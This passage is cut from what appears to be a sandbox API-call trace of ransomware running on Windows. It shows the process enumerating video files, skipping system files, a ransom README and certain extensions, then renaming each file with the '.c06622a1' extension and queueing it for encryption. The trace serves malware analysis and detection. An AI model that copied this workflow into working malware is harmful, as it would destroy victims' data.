(_Str1="ico", _Str2="avi") returned 8 [0156.261] wcslen (_String="ico") returned 0x3 [0156.261] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.261] wcslen (_String="ics") returned 0x3 [0156.261] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.261] wcslen (_String="idx") returned 0x3 [0156.261] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.261] wcslen (_String="ldf") returned 0x3 [0156.261] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.261] wcslen (_String="lnk") returned 0x3 [0156.261] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.261] wcslen (_String="mod") returned 0x3 [0156.261] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.261] wcslen (_String="mpa") returned 0x3 [0156.262] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.262] wcslen (_String="msc") returned 0x3 [0156.262] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.262] wcslen (_String="msp") returned 0x3 [0156.262] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.262] wcslen (_String="msstyles") returned 0x8 [0156.262] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.262] wcslen (_String="msu") returned 0x3 [0156.262] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.262] wcslen (_String="nls") returned 0x3 [0156.262] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.262] wcslen (_String="nomedia") returned 0x7 [0156.262] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.262] wcslen (_String="ocx") returned 0x3 [0156.262] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.262] wcslen (_String="prf") returned 0x3 [0156.262] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.262] wcslen (_String="ps1") returned 0x3 [0156.262] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.262] wcslen (_String="rom") returned 0x3 [0156.262] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.262] wcslen (_String="rtp") returned 0x3 [0156.262] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.262] wcslen (_String="scr") returned 0x3 [0156.262] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.262] wcslen (_String="shs") returned 0x3 [0156.262] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.262] wcslen (_String="spl") returned 0x3 [0156.262] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.262] wcslen (_String="sys") returned 0x3 [0156.262] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.262] wcslen (_String="theme") returned 0x5 [0156.262] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.262] wcslen (_String="themepack") returned 0x9 [0156.262] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.262] wcslen (_String="wpx") returned 0x3 [0156.262] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.262] wcslen (_String="lock") returned 0x4 [0156.263] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.263] wcslen (_String="key") returned 0x3 [0156.263] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.263] wcslen (_String="hta") returned 0x3 [0156.263] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.263] wcslen (_String="msi") returned 0x3 [0156.263] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.263] wcslen (_String="pdb") returned 0x3 [0156.263] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.263] wcslen (_String="sql") returned 0x3 [0156.263] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.263] wcslen (_String="sqlite") returned 0x6 [0156.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.263] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.263] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.263] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned 0x4d [0156.263] wcscpy (in: _Dest=0x4530144, _Source="9SrRbKrmvJ.avi" | out: _Dest="9SrRbKrmvJ.avi") returned="9SrRbKrmvJ.avi" [0156.263] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi", dwFileAttributes=0x80) returned 1 [0156.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\9srrbkrmvj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0156.264] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.264] ReadFile (in: hFile=0x630, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.265] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x31cfffc1 [0156.265] RtlComputeCrc32 (PartialCrc=0xffc1, Buffer=0x3fe674, Length=0x80) returned 0x31d03a66 [0156.265] RtlComputeCrc32 (PartialCrc=0x3a66, Buffer=0x3fe674, Length=0x80) returned 0x9c1b1850 [0156.265] RtlComputeCrc32 (PartialCrc=0x1850, Buffer=0x3fe674, Length=0x80) returned 0xc71a21ff [0156.265] RtlComputeCrc32 (PartialCrc=0x21ff, Buffer=0x3fe674, Length=0x80) returned 0x6b2cf048 [0156.265] CloseHandle (hObject=0x630) returned 1 [0156.265] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.265] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi" [0156.265] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi") returned 0x5c [0156.265] wcscpy (in: _Dest=0x4540168, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.265] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\9srrbkrmvj.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\9srrbkrmvj.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\9SrRbKrmvJ.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\9srrbkrmvj.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0156.267] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.268] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x546b7710 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1dc649a5 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39b0fd07 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc9507ad [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72fe0846 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3049a928 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x52a69308 [0156.273] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb8d5634 [0156.276] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0x18c1487e [0156.276] RtlComputeCrc32 (PartialCrc=0x487e, Buffer=0x2910094, Length=0x80) returned 0x9bfa54ba [0156.276] RtlComputeCrc32 (PartialCrc=0x54ba, Buffer=0x2910094, Length=0x80) returned 0x293a53bf [0156.276] RtlComputeCrc32 (PartialCrc=0x53bf, Buffer=0x2910094, Length=0x80) returned 0xdce094a [0156.276] RtlComputeCrc32 (PartialCrc=0x94a, Buffer=0x2910094, Length=0x80) returned 0x6cecd7da [0156.276] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.276] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.276] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.276] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbd8b6f0, ftCreationTime.dwHighDateTime=0x1d5dd76, ftLastAccessTime.dwLowDateTime=0x49cbd8b0, ftLastAccessTime.dwHighDateTime=0x1d5e617, ftLastWriteTime.dwLowDateTime=0x49cbd8b0, ftLastWriteTime.dwHighDateTime=0x1d5e617, nFileSizeHigh=0x0, nFileSizeLow=0xfa03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bl3DNUZ9Mf.mkv", cAlternateFileName="BL3DNU~1.MKV")) returned 1 [0156.276] _wcsicmp (_Str1="Bl3DNUZ9Mf.mkv", _Str2="README.c06622a1.TXT") returned -16 [0156.276] wcsstr (_Str="Bl3DNUZ9Mf.mkv", _SubStr="README") returned 0x0 [0156.276] _wcsicmp (_Str1="autorun.inf", _Str2="Bl3DNUZ9Mf.mkv") returned -1 [0156.276] wcslen (_String="autorun.inf") returned 0xb [0156.276] _wcsicmp (_Str1="boot.ini", _Str2="Bl3DNUZ9Mf.mkv") returned 3 [0156.276] wcslen (_String="boot.ini") returned 0x8 [0156.276] _wcsicmp (_Str1="bootfont.bin", _Str2="Bl3DNUZ9Mf.mkv") returned 3 [0156.276] wcslen (_String="bootfont.bin") returned 0xc [0156.276] _wcsicmp (_Str1="bootsect.bak", _Str2="Bl3DNUZ9Mf.mkv") returned 3 [0156.277] wcslen (_String="bootsect.bak") returned 0xc [0156.277] _wcsicmp (_Str1="desktop.ini", _Str2="Bl3DNUZ9Mf.mkv") returned 2 [0156.277] wcslen (_String="desktop.ini") returned 0xb [0156.277] _wcsicmp (_Str1="iconcache.db", _Str2="Bl3DNUZ9Mf.mkv") returned 7 [0156.277] wcslen (_String="iconcache.db") returned 0xc [0156.277] _wcsicmp (_Str1="ntldr", _Str2="Bl3DNUZ9Mf.mkv") returned 12 [0156.277] wcslen (_String="ntldr") returned 0x5 [0156.277] _wcsicmp (_Str1="ntuser.dat", _Str2="Bl3DNUZ9Mf.mkv") returned 12 [0156.277] wcslen (_String="ntuser.dat") returned 0xa [0156.277] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Bl3DNUZ9Mf.mkv") returned 12 [0156.277] wcslen (_String="ntuser.dat.log") returned 0xe [0156.277] _wcsicmp (_Str1="ntuser.ini", _Str2="Bl3DNUZ9Mf.mkv") returned 12 [0156.277] wcslen (_String="ntuser.ini") returned 0xa [0156.277] _wcsicmp (_Str1="thumbs.db", _Str2="Bl3DNUZ9Mf.mkv") returned 18 [0156.277] wcslen (_String="thumbs.db") returned 0x9 [0156.277] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.277] wcslen (_String="386") returned 0x3 [0156.277] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.277] wcslen (_String="adv") returned 0x3 [0156.277] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.277] wcslen (_String="ani") returned 0x3 [0156.277] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.277] wcslen (_String="bat") returned 0x3 [0156.277] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.277] wcslen (_String="bin") returned 0x3 [0156.277] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.277] wcslen (_String="cab") returned 0x3 [0156.277] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.277] wcslen (_String="cmd") returned 0x3 [0156.277] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.277] wcslen (_String="com") returned 0x3 [0156.277] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.277] wcslen (_String="cpl") returned 0x3 [0156.277] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.277] wcslen (_String="cur") returned 0x3 [0156.277] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.277] wcslen (_String="deskthemepack") returned 0xd [0156.277] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.278] wcslen (_String="diagcab") returned 0x7 [0156.278] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.278] wcslen (_String="diagcfg") returned 0x7 [0156.278] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.278] wcslen (_String="diagpkg") returned 0x7 [0156.278] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.278] wcslen (_String="dll") returned 0x3 [0156.278] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.278] wcslen (_String="drv") returned 0x3 [0156.278] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.278] wcslen (_String="exe") returned 0x3 [0156.278] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.278] wcslen (_String="hlp") returned 0x3 [0156.278] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.278] wcslen (_String="icl") returned 0x3 [0156.278] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.278] wcslen (_String="icns") returned 0x4 [0156.278] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.278] wcslen (_String="ico") returned 0x3 [0156.278] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.278] wcslen (_String="ics") returned 0x3 [0156.278] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.278] wcslen (_String="idx") returned 0x3 [0156.278] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.278] wcslen (_String="ldf") returned 0x3 [0156.278] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.278] wcslen (_String="lnk") returned 0x3 [0156.278] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.278] wcslen (_String="mod") returned 0x3 [0156.278] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.278] wcslen (_String="mpa") returned 0x3 [0156.278] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.278] wcslen (_String="msc") returned 0x3 [0156.278] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.278] wcslen (_String="msp") returned 0x3 [0156.278] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.278] wcslen (_String="msstyles") returned 0x8 [0156.278] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.278] wcslen (_String="msu") returned 0x3 [0156.279] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.279] wcslen (_String="nls") returned 0x3 [0156.279] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.279] wcslen (_String="nomedia") returned 0x7 [0156.279] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.279] wcslen (_String="ocx") returned 0x3 [0156.279] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.279] wcslen (_String="prf") returned 0x3 [0156.279] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.279] wcslen (_String="ps1") returned 0x3 [0156.279] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.279] wcslen (_String="rom") returned 0x3 [0156.279] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.279] wcslen (_String="rtp") returned 0x3 [0156.279] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.279] wcslen (_String="scr") returned 0x3 [0156.279] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.279] wcslen (_String="shs") returned 0x3 [0156.279] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.279] wcslen (_String="spl") returned 0x3 [0156.279] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.279] wcslen (_String="sys") returned 0x3 [0156.279] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.279] wcslen (_String="theme") returned 0x5 [0156.279] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.279] wcslen (_String="themepack") returned 0x9 [0156.279] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.279] wcslen (_String="wpx") returned 0x3 [0156.279] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.279] wcslen (_String="lock") returned 0x4 [0156.279] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.280] wcslen (_String="key") returned 0x3 [0156.280] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.280] wcslen (_String="hta") returned 0x3 [0156.280] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.280] wcslen (_String="msi") returned 0x3 [0156.280] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.280] wcslen (_String="pdb") returned 0x3 [0156.280] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.280] wcslen (_String="sql") returned 0x3 [0156.280] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.280] wcslen (_String="sqlite") returned 0x6 [0156.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.280] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.280] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.280] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned 0x4d [0156.280] wcscpy (in: _Dest=0x4530144, _Source="Bl3DNUZ9Mf.mkv" | out: _Dest="Bl3DNUZ9Mf.mkv") returned="Bl3DNUZ9Mf.mkv" [0156.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv", dwFileAttributes=0x80) returned 1 [0156.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\bl3dnuz9mf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0156.281] SetFilePointerEx (in: hFile=0x668, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.281] ReadFile (in: hFile=0x668, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.282] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x1751ef00 [0156.282] RtlComputeCrc32 (PartialCrc=0xef00, Buffer=0x3fe674, Length=0x80) returned 0x3decf3c1 [0156.282] RtlComputeCrc32 (PartialCrc=0xf3c1, Buffer=0x3fe674, Length=0x80) returned 0xb67878f7 [0156.282] RtlComputeCrc32 (PartialCrc=0x78f7, Buffer=0x3fe674, Length=0x80) returned 0xbea8cc49 [0156.282] RtlComputeCrc32 (PartialCrc=0xcc49, Buffer=0x3fe674, Length=0x80) returned 0xbd744cf7 [0156.282] CloseHandle (hObject=0x668) returned 1 [0156.282] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.282] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv" [0156.282] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv") returned 0x5c [0156.282] wcscpy (in: _Dest=0x4540168, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.282] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\bl3dnuz9mf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\bl3dnuz9mf.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Bl3DNUZ9Mf.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\bl3dnuz9mf.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x668 [0156.284] CreateIoCompletionPort (FileHandle=0x668, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.284] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b02cb8 [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d8a4c1d [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51361307 [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x216ce86e [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d6d9fb0 [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3311ab11 [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x636d2e5e [0156.290] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2be85ec2 [0156.293] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xe0b9c4b2 [0156.293] RtlComputeCrc32 (PartialCrc=0xc4b2, Buffer=0x2f30094, Length=0x80) returned 0x64da8741 [0156.293] RtlComputeCrc32 (PartialCrc=0x8741, Buffer=0x2f30094, Length=0x80) returned 0xcfe68e3c [0156.293] RtlComputeCrc32 (PartialCrc=0x8e3c, Buffer=0x2f30094, Length=0x80) returned 0xc0001ce4 [0156.293] RtlComputeCrc32 (PartialCrc=0x1ce4, Buffer=0x2f30094, Length=0x80) returned 0xfff27317 [0156.293] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.293] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.293] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.293] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c71ee0, ftCreationTime.dwHighDateTime=0x1d5e18a, ftLastAccessTime.dwLowDateTime=0x5772c7f0, ftLastAccessTime.dwHighDateTime=0x1d5e606, ftLastWriteTime.dwLowDateTime=0x5772c7f0, ftLastWriteTime.dwHighDateTime=0x1d5e606, nFileSizeHigh=0x0, nFileSizeLow=0x10699, dwReserved0=0x0, dwReserved1=0x0, cFileName="ccRD.swf", cAlternateFileName="")) returned 1 [0156.293] _wcsicmp (_Str1="ccRD.swf", _Str2="README.c06622a1.TXT") returned -15 [0156.293] wcsstr (_Str="ccRD.swf", _SubStr="README") returned 0x0 [0156.293] _wcsicmp (_Str1="autorun.inf", _Str2="ccRD.swf") returned -2 [0156.293] wcslen (_String="autorun.inf") returned 0xb [0156.293] _wcsicmp (_Str1="boot.ini", _Str2="ccRD.swf") returned -1 [0156.293] wcslen (_String="boot.ini") returned 0x8 [0156.293] _wcsicmp (_Str1="bootfont.bin", _Str2="ccRD.swf") returned -1 [0156.293] wcslen (_String="bootfont.bin") returned 0xc [0156.293] _wcsicmp 